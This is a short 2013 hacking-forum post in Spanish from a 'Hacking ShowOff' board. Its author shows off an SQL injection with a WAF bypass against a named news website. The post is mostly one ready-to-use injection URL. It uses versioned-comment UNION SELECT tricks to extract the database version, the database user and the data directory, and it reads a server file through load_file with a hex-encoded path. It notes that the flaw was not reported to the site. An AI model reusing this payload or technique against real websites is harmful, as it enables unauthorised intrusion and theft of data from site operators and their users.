Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Julio 25, 2013, 02:55:56 AM

Título: SQLI WAF Bypass y SQLI LoadFile http://www.lasemana.es/
Publicado por: Muppet en Julio 25, 2013, 02:55:56 AM
(http://i39.tinypic.com/23jrfwi.png)

SQLI

Vector: http://www.lasemana.es/periodico/noticia.php?cod=34689 /*!50000union*/ /*!50000select*/ 1,2,3,0x6864627265616b6572,version(),6,user(),load_file(0x2f7661722f6c69622f6d7973716c2f746573742e747874),@@datadir,10,11,12,13,14,15,16 limit 1,1-- -c
Reportado: No